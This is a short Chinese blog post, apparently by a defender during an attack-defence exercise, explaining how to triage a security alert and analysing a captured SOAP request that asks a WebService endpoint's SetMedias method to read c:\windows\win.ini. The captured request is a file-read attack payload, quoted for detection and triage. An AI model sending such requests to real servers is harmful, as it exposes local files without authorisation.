我见我思之hvv偷师学艺——远程文件包含 windows.ini

注：本文仅作为技术交流使用，如有违反行为本文作者概不负责。

常见告警信息价值提取：

源IP

大概率为代理IP，可通过情报平台进行识别此IP的历史攻击行为。

源端口

参考意义不大。

目的IP

我方资产IP（可定位疑似漏洞的具体资产范围）。

目的端口

我方资产IP对应端口（可辅助确认端口所在资产范围）。

响应码

辅助确认漏洞是否成功（200代表疑似漏洞利用成功。4XX/5XX一般都是利用失败）。

载荷：

POST /services/WebServiceSoap HTTP/1.1
Accept-Encoding:gzip,deflate
Content-Type:text/xml;charset=UTF-8
SOAPAction:"http://x.x.x/"

漏洞所在域名地址

Content-Length:297
Host:x.x.x.x:xx

目的IP地址

User-Agent:Apache-HttpClient/4.5.5(Java/16.0.2)
Connection:close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:net="http://x.x.x/">

目的域名地址

<soapenv:Header/>
<soapenv:Body>
<net:SetMedias>
<net:fullPath>c:\windows\win.ini</net:fullPath>
</net:SetMedias>
</soappenv:Body>
</soapenv:Envelope>

---

攻击特征：

请求内容 “c:\windows”。

漏洞解析：

漏洞名称：

Web Service服务器——敏感信息泄漏漏洞（通过搜索此漏洞的主要程序文件“/services/WebServiceSoap”发现）

漏洞利用原理：

东西太多太细太碎，详情请见其他师傅的链接：https://cloud.tencent.com/developer/article/1666998

漏洞挖掘思路：

东西太多太细太碎，详情请见其他师傅的链接：https://blog.csdn.net/weixin_41489908/article/details/109378400

总结与收获：

通过发掘请求包中 “带有特定关键字” 特征的WebService服务地址，来锁定具有 “WebSevice应用程序” 的系统。利用此应用程序可以 以 远程调用的方式，向服务器请求 “xml格式数据”，从而获取到系统本地的敏感信息文件内容（如果服务器防护措施不当）。

SOAP型的Web Service应用程序，允许我们使用xml格式访问服务器。

_{行动即是选择}